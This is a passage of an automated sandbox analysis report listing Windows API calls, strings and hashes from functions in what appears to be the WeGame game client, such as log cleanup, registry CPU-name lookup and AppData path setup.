                                                                • ?ReadPrivateProfile@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0AAHAAV45@@Z.COMMON(tgp,OverwriteStatus,?,?,?,?,?,?,?,?,?,?,?,0000007C,00459FD5), ref: 0045DA8C
                                                                • ?ReadPrivateProfile@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0AAHAAV45@@Z.COMMON(tgp,SubError,?,?), ref: 0045DABA
                                                                • ?ReadPrivateProfile@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0AAHAAV45@@Z.COMMON(tgp,TickWaitMain,?,?,tgp,SubError,?,?), ref: 0045DACD
                                                                • ?ReadPrivateProfile@Sys_wrapper@common@ierd_tgp@@SA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@0AAHAAV45@@Z.COMMON(tgp,TickMoveFile,?,?,tgp,TickWaitMain,?,?,tgp,SubError,?,?), ref: 0045DAE0
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 0045DB02
                                                                  • Part of subcall function 0043DF1B: __EH_prolog3.LIBCMT ref: 0043DF22
                                                                  • Part of subcall function 0043F4BB: __EH_prolog3_catch_GS.LIBCMT ref: 0043F4C2
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: D@std@@U?$char_traits@V45@@V?$allocator@V?$basic_string@$D@2@@std@@0PrivateProfile@ReadSys_wrapper@common@ierd_tgp@@$?get_log_instance@base@@Logger@1@$?get_app_sub_path@Application@common@ierd_tgp@@D@2@@std@@H_prolog3H_prolog3_H_prolog3_catch_
                                                                • String ID: OverwriteStatus$SubError$TickMoveFile$TickWaitMain$[main]CheckLastUpdate$[main][Liveupdate]not in file-overwritting process$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp$tgp$update.tmp
                                                                • API String ID: 1990170196-1541422376
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_catch_GS.LIBCMT ref: 0045E61F
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0045E66C
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0045E698
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0045E6BB
                                                                • SimpleUString::operator=.MSOBJ140-MSVCRT ref: 0045E6DE
                                                                  • Part of subcall function 004599E1: __EH_prolog3.LIBCMT ref: 004599E8
                                                                  • Part of subcall function 00450F32: __EH_prolog3_GS.LIBCMT ref: 00450F39
                                                                  • Part of subcall function 00458990: __EH_prolog3_GS.LIBCMT ref: 0045899A
                                                                  • Part of subcall function 00458990: _Open_dir.MSVCP140(?,?,?,?,?,?,?,00000000,Function_00066916,00000218), ref: 00458A16
                                                                  • Part of subcall function 0043DF6D: __EH_prolog3.LIBCMT ref: 0043DF74
                                                                  • Part of subcall function 004694EE: __EH_prolog3_GS.LIBCMT ref: 004694F5
                                                                  • Part of subcall function 0040BBD0: _invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,0040E902,?,?), ref: 0040BC1D
                                                                • DeleteFileW.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,00000018,00000004,Function_0000BBD0,000001D4), ref: 0045E7EE
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 0045E7FC
                                                                • GetLastError.KERNEL32(?,00000005,e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp,00000352,0048BBC7), ref: 0045E84E
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 0045E8B6
                                                                Strings
                                                                • clear_log_file, delete log file[%s] failed:[%d], xrefs: 0045E87C
                                                                • clear_log_file, delete log file[%s] success, xrefs: 0045E924
                                                                • TinyNew.log, xrefs: 0045E68D
                                                                • daemon_x.log, xrefs: 0045E6B3
                                                                • e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp, xrefs: 0045E82C, 0045E8E6
                                                                • TinyDL_Ex.log, xrefs: 0045E661
                                                                • daemon_m.log, xrefs: 0045E6D6
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3337069319.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_400000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: SimpleString::operator=$H_prolog3_$?get_log_instance@base@@H_prolog3Logger@1@$DeleteErrorFileH_prolog3_catch_LastOpen_dir_invalid_parameter_noinfo_noreturn
                                                                • String ID: TinyDL_Ex.log$TinyNew.log$clear_log_file, delete log file[%s] failed:[%d]$clear_log_file, delete log file[%s] success$daemon_m.log$daemon_x.log$e:\dailybuild_dev\wegame_client\codes\main\tgp_daemon\src\tgp_daemon_main.cpp
                                                                • API String ID: 3116233958-2813812632
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • ?stamp_point@@YAXPBD@Z.COMMON(sys_begin,?), ref: 6BD2789B
                                                                  • Part of subcall function 6BDAA432: GetCurrentThread.KERNEL32 ref: 6BDAA443
                                                                  • Part of subcall function 6BDAA432: SetThreadAffinityMask.KERNEL32(00000000), ref: 6BDAA44A
                                                                  • Part of subcall function 6BDAA432: QueryPerformanceCounter.KERNEL32(6BD579EB,?,?,?,6BD579EB,init plugin end:), ref: 6BDAA456
                                                                  • Part of subcall function 6BDAA432: GetCurrentThread.KERNEL32 ref: 6BDAA45D
                                                                  • Part of subcall function 6BDAA432: SetThreadAffinityMask.KERNEL32(00000000), ref: 6BDAA464
                                                                  • Part of subcall function 6BDAA432: strncpy_s.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00000050,6BD579EB,000000FF,?,?,?,6BD579EB,init plugin end:), ref: 6BDAA481
                                                                • QueryPerformanceFrequency.KERNEL32(6C0984B0,?), ref: 6BD278B3
                                                                • QueryPerformanceCounter.KERNEL32(?,?), ref: 6BD278BD
                                                                • TranslateMessage.USER32(?), ref: 6BD278D9
                                                                • GetTickCount.KERNEL32 ref: 6BD278FA
                                                                • SetEvent.KERNEL32(?), ref: 6BD27914
                                                                • DispatchMessageW.USER32(?), ref: 6BD2791E
                                                                • GetTickCount.KERNEL32 ref: 6BD27928
                                                                • ?exit_app@Application@common@ierd_tgp@@QAEXH@Z.COMMON(0000012C), ref: 6BD27942
                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 6BD2794B
                                                                • __aulldiv.LIBCMT ref: 6BD279D7
                                                                • PeekMessageA.USER32(?,00000000,00000113,00000113,00000000), ref: 6BD279F4
                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 6BD27A15
                                                                • ?stamp_point@@YAXPBD@Z.COMMON(sys_end), ref: 6BD27A28
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: MessagePerformanceQueryThread$Counter$?stamp_point@@AffinityCountCurrentMaskPeekTick$?exit_app@Application@common@ierd_tgp@@DispatchEventFrequencyTranslate__aulldivstrncpy_s
                                                                • String ID: sys_begin$sys_end
                                                                • API String ID: 3393281382-3668967762
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BDBB3FD
                                                                  • Part of subcall function 6BD0A8F0: memmove.VCRUNTIME140(?,?,6BD15839,?,?,00000000,?,?,6BD15839,?,?), ref: 6BD0A917
                                                                • RegOpenKeyExW.KERNEL32(80000002,HARDWARE\DESCRIPTION\System\CentralProcessor\0,00000000,00020019,?,unknow,00000006,0000027C), ref: 6BDBB42C
                                                                • memset.VCRUNTIME140(?,00000000,00000208), ref: 6BDBB447
                                                                • RegQueryValueExW.KERNEL32(?,ProcessorNameString,00000000,?,?,00000104), ref: 6BDBB484
                                                                • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?,?), ref: 6BDBB4D0
                                                                  • Part of subcall function 6BDAB79E: __EH_prolog3_GS.LIBCMT ref: 6BDAB7A5
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6BDBB4EB
                                                                • GetLastError.KERNEL32(00000000,00000005,e:\dailybuild_dev\wegame_client\codes\common\src\sys_wrapper.cpp,0000057B,6C02E7BF), ref: 6BDBB533
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6BDBB54C
                                                                • GetLastError.KERNEL32(00000000,00000005,e:\dailybuild_dev\wegame_client\codes\common\src\sys_wrapper.cpp,0000057E,6C02E7BF), ref: 6BDBB58C
                                                                • RegCloseKey.ADVAPI32(?), ref: 6BDBB5B7
                                                                Strings
                                                                • e:\dailybuild_dev\wegame_client\codes\common\src\sys_wrapper.cpp, xrefs: 6BDBB517, 6BDBB570
                                                                • [Sys_wrapper][get_cpu_name]open cpu reg failed. error_code=%d, xrefs: 6BDBB593
                                                                • unknow, xrefs: 6BDBB409
                                                                • [Sys_wrapper][get_cpu_name]query cpu reg failed. query_result = %d,error_code=%d, xrefs: 6BDBB53B
                                                                • ProcessorNameString, xrefs: 6BDBB479
                                                                • HARDWARE\DESCRIPTION\System\CentralProcessor\0, xrefs: 6BDBB422
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?get_log_instance@base@@ErrorH_prolog3_LastLogger@1@$?u16to8@common@ierd_tgp@@CloseD@2@@4@@D@std@@OpenQueryU?$char_traits@U?$char_traits@_V?$allocator@V?$allocator@_V?$basic_string@V?$basic_string@_ValueW@2@@std@@W@std@@memmovememset
                                                                • String ID: HARDWARE\DESCRIPTION\System\CentralProcessor\0$ProcessorNameString$[Sys_wrapper][get_cpu_name]open cpu reg failed. error_code=%d$[Sys_wrapper][get_cpu_name]query cpu reg failed. query_result = %d,error_code=%d$e:\dailybuild_dev\wegame_client\codes\common\src\sys_wrapper.cpp$unknow
                                                                • API String ID: 2700574034-3125235006
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD952D6
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(0000007C,6BD95F45,6BD43A1D,0000009C,6BD56BD6,?,00000001,?,00000000,0000008C,6BD577C5,00000002,00000000,?), ref: 6BD952E8
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000002,0000007C,6BD95F45,6BD43A1D,0000009C,6BD56BD6,?,00000001,?,00000000), ref: 6BD953D7
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000001,00000001,?,00000002,6BD577C5,00000000,00000001,00000002,0000007C,6BD95F45,6BD43A1D,0000009C,6BD56BD6,?,00000001,?), ref: 6BD9546B
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000001,00000001,?,00000002,6BD577C5,00000000,00000001,00000000,?,00000002,6BD577C5,00000000,00000001,00000002,0000007C,6BD95F45), ref: 6BD955E3
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000000,00000001,00000002,00000001,?,00000002,6BD577C5,00000000,00000001,00000000,?,00000002,6BD577C5,00000000,00000001,00000002), ref: 6BD9566E
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000001,00000001,6BD577C5,00000000,00000001,?,00000000,?,00000002,6BD577C5,00000000,00000001,00000002,0000007C,6BD95F45,6BD43A1D), ref: 6BD95748
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000000,00000001,00000002,00000001,?,00000002,6BD577C5,00000000,00000001,00000002,0000007C,6BD95F45,6BD43A1D,0000009C,6BD56BD6,?), ref: 6BD954F6
                                                                  • Part of subcall function 6BD1A5EF: __EH_prolog3.LIBCMT ref: 6BD1A5F6
                                                                  • Part of subcall function 6BD1E945: __EH_prolog3_catch_GS.LIBCMT ref: 6BD1E94C
                                                                  • Part of subcall function 6BD96485: __EH_prolog3_GS.LIBCMT ref: 6BD9648F
                                                                  • Part of subcall function 6BD96485: ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000003,00000001,00000118,6BD95745,00000001,00000001,6BD577C5,00000000,00000001,?,00000000,?,00000002,6BD577C5,00000000,00000001), ref: 6BD964E1
                                                                  • Part of subcall function 6BD96485: ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(00000001,6BD43A1D,00000000,00000003,00000001,00000118,6BD95745,00000001,00000001,6BD577C5,00000000,00000001,?,00000000,?,00000002), ref: 6BD96578
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                • Associated: 00000003.00000002.3338522371.000000006BD00000.00000002.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338695743.000000006BF9D000.00000002.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338761936.000000006C081000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338775722.000000006C082000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338790575.000000006C084000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338805103.000000006C08C000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338821002.000000006C08E000.00000008.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338835359.000000006C098000.00000004.00000001.01000000.00000009.sdmp
                                                                • Associated: 00000003.00000002.3338849899.000000006C0A0000.00000002.00000001.01000000.00000009.sdmp
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?get_log_instance@base@@Logger@1@$H_prolog3_$H_prolog3H_prolog3_catch_
                                                                • String ID: [qos_t] can`t find qos id for kind = %d$[qos_t]OfflineMode, disable real_report: %d.$[qos_t]id=%d report http to new server$[qos_t]id=%d report http to old server$[qos_t]id=%d report udp to new server$[qos_t]id=%d report udp to old server$e:\dailybuild_dev\wegame_client\codes\common\src\qos_command.cpp
                                                                • API String ID: 2885499593-3968730925
                                                                • Opcode ID: 8c34280c7ac8056cd03a6dcd3ba213db8ec4063cefd72fd92e4e70f24192f451
                                                                • Instruction ID: ce200d38535823ca8b8d9cd33c1d320e6f3c400e997466ea13c407b0e01cd66b
                                                                • Opcode Fuzzy Hash: 8c34280c7ac8056cd03a6dcd3ba213db8ec4063cefd72fd92e4e70f24192f451
                                                                • Instruction Fuzzy Hash: 5DE19270D00714DFCB14EFA4D891A9DB7B5AF05328F1041A8E9656F392DB3AAE05CBA4
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BD4A5BF
                                                                  • Part of subcall function 6BD4A27E: __EH_prolog3_catch_GS.LIBCMT ref: 6BD4A288
                                                                  • Part of subcall function 6BD4A27E: ?is_absolute@path@filesystem@ierd_tgp@@QBE_NXZ.COMMON ref: 6BD4A2A5
                                                                  • Part of subcall function 6BD4A27E: ?current_path@filesystem@ierd_tgp@@YA?AVpath@12@XZ.COMMON(?), ref: 6BD4A2C0
                                                                  • Part of subcall function 6BD4A27E: ?absolute@filesystem@ierd_tgp@@YA?AVpath@12@ABV312@0@Z.COMMON(00000000,?,00000000,?), ref: 6BD4A2EE
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,?,00000000,00000200,6BD4A4EA,?,?,00000000,?,000000A0,6BD47025,?), ref: 6BD4A7CA
                                                                  • Part of subcall function 6BD447CC: __EH_prolog3.LIBCMT ref: 6BD447D3
                                                                • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(?,00000020,00000040,00000001,?,?,?,?,00000000,00000200,6BD4A4EA,?,?,00000000,?,000000A0), ref: 6BD4A7BD
                                                                  • Part of subcall function 6BD44967: __EH_prolog3.LIBCMT ref: 6BD4496E
                                                                  • Part of subcall function 6BD44967: ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IAE@XZ.MSVCP140(00000008,6BD4A6BA,00000001,00000001,?,00000020,00000040,00000001,?,?,?,?,00000000,00000200,6BD4A4EA,?), ref: 6BD4498B
                                                                  • Part of subcall function 6BD44967: ??0?$basic_istream@DU?$char_traits@D@std@@@std@@QAE@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@_N@Z.MSVCP140(00000007,00000000,00000000,00000008,6BD4A6BA,00000001,00000001,?,00000020,00000040,00000001,?,?,?,?,00000000), ref: 6BD449A3
                                                                • ?decode_stream@common@ierd_tgp@@YA?AV?$optional@V?$reference_wrapper@V?$basic_istringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@std@@@std@@AAV?$basic_istream@DU?$char_traits@D@std@@@4@AAV?$basic_istringstream@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,?,?,00000001,00000001,?,00000020,00000040,00000001,?,?,?,?,00000000,00000200,6BD4A4EA), ref: 6BD4A6D3
                                                                  • Part of subcall function 6BD5EA3A: __EH_prolog3_GS.LIBCMT ref: 6BD5EA44
                                                                  • Part of subcall function 6BD5EA3A: ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QAEAAV01@PAV?$basic_streambuf@DU?$char_traits@D@std@@@1@@Z.MSVCP140(00000008,00000002,00000001,000000BC,6BD4A6D8,?,?,?,00000001,00000001,?,00000020,00000040,00000001,?,?), ref: 6BD5EA74
                                                                  • Part of subcall function 6BD5EA3A: ?decode_string@common@ierd_tgp@@YA?AV?$optional@V?$reference_wrapper@V?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@std@@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,00000000,00000000), ref: 6BD5EA95
                                                                  • Part of subcall function 6BD5EA3A: ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000094), ref: 6BD5EADC
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?), ref: 6BD4A6E2
                                                                  • Part of subcall function 6BD1A5EF: __EH_prolog3.LIBCMT ref: 6BD1A5F6
                                                                  • Part of subcall function 6BD1E945: __EH_prolog3_catch_GS.LIBCMT ref: 6BD1E94C
                                                                • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(?,?,?), ref: 6BD4A76F
                                                                • ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UAE@XZ.MSVCP140(?,?,?), ref: 6BD4A78A
                                                                • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,00000000,?,?,?,00000000,00000200,6BD4A4EA,?,?,00000000,?,000000A0,6BD47025,?), ref: 6BD4A65F
                                                                  • Part of subcall function 6BDAB79E: __EH_prolog3_GS.LIBCMT ref: 6BDAB7A5
                                                                  • Part of subcall function 6BD49DEF: __EH_prolog3_catch_GS.LIBCMT ref: 6BD49DF9
                                                                  • Part of subcall function 6BD49DEF: ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,00000008,?,0000018C,6BD4A681,?,?,?,?,00000000,00000200,6BD4A4EA,?,?,00000000,?), ref: 6BD49E3C
                                                                  • Part of subcall function 6BD49DEF: ?exists@filesystem@ierd_tgp@@YA_NABVpath@12@@Z.COMMON(?,?,0000018C,6BD4A681,?,?,?,?,00000000,00000200,6BD4A4EA,?,?,00000000,?,000000A0), ref: 6BD49E50
                                                                • ?u16to8@common@ierd_tgp@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@AAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@4@@Z.COMMON(?,00000000,?,?,?,00000000,00000200,6BD4A4EA,?,?,00000000,?,000000A0,6BD47025,?), ref: 6BD4A867
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON(?,?,?,00000000,00000200,6BD4A4EA,?,?,00000000,?,000000A0,6BD47025,?), ref: 6BD4A87A
                                                                Strings
                                                                • e:\dailybuild_dev\wegame_client\codes\common\src\cfg_file_model.cpp, xrefs: 6BD4A706, 6BD4A7F6, 6BD4A89E
                                                                • [cfg_file_model]file not exist, path:%s, xrefs: 6BD4A819
                                                                • [cfg_file_model][read_cfg_tree]get_full_cfg_path failed, path:%s, xrefs: 6BD4A8C1
                                                                • [cfg_mgr][cfg_file]decode failed, path:%s, xrefs: 6BD4A729
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: U?$char_traits@$D@std@@D@std@@@std@@V?$allocator@$D@2@@4@@V?$basic_string@$??1?$basic_ios@$?get_log_instance@base@@?u16to8@common@ierd_tgp@@H_prolog3H_prolog3_H_prolog3_catch_Logger@1@U?$char_traits@_V?$allocator@_V?$basic_string@_W@2@@std@@W@std@@$D@2@@std@@@std@@@std@@V?$basic_istringstream@V?$basic_streambuf@V?$optional@V?$reference_wrapper@Vpath@12@$??0?$basic_ios@??0?$basic_istream@??6?$basic_ostream@?absolute@filesystem@ierd_tgp@@?current_path@filesystem@ierd_tgp@@?decode_stream@common@ierd_tgp@@?decode_string@common@ierd_tgp@@?exists@filesystem@ierd_tgp@@?is_absolute@path@filesystem@ierd_tgp@@D@std@@@1@@D@std@@@1@_D@std@@@4@V01@V312@0@V?$basic_istream@Vpath@12@@
                                                                • String ID: [cfg_file_model][read_cfg_tree]get_full_cfg_path failed, path:%s$[cfg_file_model]file not exist, path:%s$[cfg_mgr][cfg_file]decode failed, path:%s$e:\dailybuild_dev\wegame_client\codes\common\src\cfg_file_model.cpp
                                                                • API String ID: 3693779796-3530895154
                                                                • Opcode ID: 8b5e549754c4f0a08c1ad26402a48d404e3bf8e8d275d035b12320b282da92c4
                                                                • Instruction ID: 032bc29097e41ebfec82fe5648522838446e2bf0c77f4e494c87a99a2414b1b7
                                                                • Opcode Fuzzy Hash: 8b5e549754c4f0a08c1ad26402a48d404e3bf8e8d275d035b12320b282da92c4
                                                                • Instruction Fuzzy Hash: BBA1AD71C05248EEDF14DFA8CD85BDEBBB4AF25324F5440A8D144BB181EB789B48DBA1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 6BDB2A4E
                                                                • memset.VCRUNTIME140(?,00000000,00000208,000006A0,6BD45FC3,?,6BFA11FC), ref: 6BDB2A65
                                                                • memset.VCRUNTIME140(?,00000000,00000410,?,00000000,00000208,000006A0,6BD45FC3,?,6BFA11FC), ref: 6BDB2A77
                                                                • SHGetFolderPathW.SHELL32(00000000,0000801A,00000000,00000000,?), ref: 6BDB2A8E
                                                                • ?get_client_version_type@overseas@ierd_tgp@@YAHXZ.COMMON ref: 6BDB2ACE
                                                                  • Part of subcall function 6BD8DDA8: ?get_client_id@util_client_info@ierd_tgp@@YAHXZ.COMMON(?,6BDB2AD3), ref: 6BD8DDAC
                                                                • ?get_client_version_type@overseas@ierd_tgp@@YAHXZ.COMMON ref: 6BDB2AE0
                                                                • swprintf.LIBCMT ref: 6BDB2B29
                                                                • ?exists@filesystem@ierd_tgp@@YA_NABVpath@12@AAVerror_code@std@@@Z.COMMON(?,00000000), ref: 6BDB2B67
                                                                • ?create_directory_ex@Sys_wrapper@common@ierd_tgp@@SA_NABVpath@filesystem@3@@Z.COMMON(?), ref: 6BDB2B79
                                                                • ?get_log_instance@base@@YAPAVILogger@1@XZ.COMMON ref: 6BDB2BB1
                                                                  • Part of subcall function 6BD1A5EF: __EH_prolog3.LIBCMT ref: 6BD1A5F6
                                                                  • Part of subcall function 6BD1E945: __EH_prolog3_catch_GS.LIBCMT ref: 6BD1E94C
                                                                Strings
                                                                • e:\dailybuild_dev\wegame_client\codes\common\src\sys_wrapper.cpp, xrefs: 6BDB2BD5
                                                                • [Sys_wrapper]get appdata path failed, path %ws, hr 0x%08x, xrefs: 6BDB2BF4
                                                                • %s\Tencent\WeGame, xrefs: 6BDB2AE9
                                                                • %s\WeGameX, xrefs: 6BDB2AD9
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: ?get_client_version_type@overseas@ierd_tgp@@memset$?create_directory_ex@?exists@filesystem@ierd_tgp@@?get_client_id@util_client_info@ierd_tgp@@?get_log_instance@base@@FolderH_prolog3H_prolog3_H_prolog3_catch_Logger@1@PathSys_wrapper@common@ierd_tgp@@Verror_code@std@@@Vpath@12@Vpath@filesystem@3@@swprintf
                                                                • String ID: %s\Tencent\WeGame$%s\WeGameX$[Sys_wrapper]get appdata path failed, path %ws, hr 0x%08x$e:\dailybuild_dev\wegame_client\codes\common\src\sys_wrapper.cpp
                                                                • API String ID: 1556443052-2923592151
                                                                • Opcode ID: abbeb9a67a1871b9f3f308549bcfbdae208c94e66eeb50f7af705baf1b3defea
                                                                • Instruction ID: 941cc9689a9e09e130c8a093ef17b2fc769c5deaefedb3433987707f882dfde3
                                                                • Opcode Fuzzy Hash: abbeb9a67a1871b9f3f308549bcfbdae208c94e66eeb50f7af705baf1b3defea
                                                                • Instruction Fuzzy Hash: D14192B1951228AADB60DFB0CC85BCD7779AF55328F1001D9D509BB080EF3A9B95CF61
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • memset.VCRUNTIME140(?,00000000,00000100), ref: 6BD23D70
                                                                • strcpy_s.API-MS-WIN-CRT-STRING-L1-1-0(?,00000100,?), ref: 6BD23D89
                                                                • CreateWindowExA.USER32(00000000,static,?,00000000,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 6BD23DC5
                                                                • SetLastError.KERNEL32(00000000), ref: 6BD23DD3
                                                                • SetWindowLongA.USER32(00000000,000000FC,?), ref: 6BD23DDD
                                                                • GetLastError.KERNEL32 ref: 6BD23DF0
                                                                • SetLastError.KERNEL32(00000000), ref: 6BD23DF8
                                                                • SetWindowLongA.USER32(00000000,000000EB), ref: 6BD23E02
                                                                • GetLastError.KERNEL32 ref: 6BD23E0C
                                                                • DestroyWindow.USER32(00000000), ref: 6BD23E13
                                                                • ShowWindow.USER32(00000000,00000000), ref: 6BD23E20
                                                                • UpdateWindow.USER32(00000000), ref: 6BD23E27
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000003.00000002.3338535311.000000006BD01000.00000020.00000001.01000000.00000009.sdmp, Offset: 6BD00000, based on PE: true
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_3_2_6bd00000_Wegame.jbxd
                                                                Similarity
                                                                • API ID: Window$ErrorLast$Long$CreateDestroyShowUpdatememsetstrcpy_s
                                                                • String ID: TCLS_CORE_WND_%u$static
                                                                • API String ID: 698125720-2282508738
                                                                • Opcode ID: a945d94e00d8aa858c479c8cb4448e1ae9f68f59d2e76f36d6814b7ff8bd6f23
                                                                • Instruction ID: ceaa15d641aad4fc7dbed40433682012e7edffd820a974747d4b51f1d5a7eb3c
                                                                • Opcode Fuzzy Hash: a945d94e00d8aa858c479c8cb4448e1ae9f68f59d2e76f36d6814b7ff8bd6f23
                                                                • Instruction Fuzzy Hash: 232129B5650215BFDB207B698C49F6F37ACDF0A724F100155BE04E6180DA78DD0987B1
                                                                Uniqueness

                                                                Uniqueness Score: -1.00%

                                                                APIs
                                                                • __EH_prolog3_GS.LIBCMT ref: 0045A697
                                                                  • Part of subcall function 0045A5FA: __EH_prolog3.LIBCMT ref: 0045A601
                                                                • ?get_graphic_card_name@Sys_wrapper@common@ierd_tgp@@SAXAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z.COMMON(?,00000001,000000C4,0045A022,00000000,00000000,00000000,00000000), ref: 0045A711
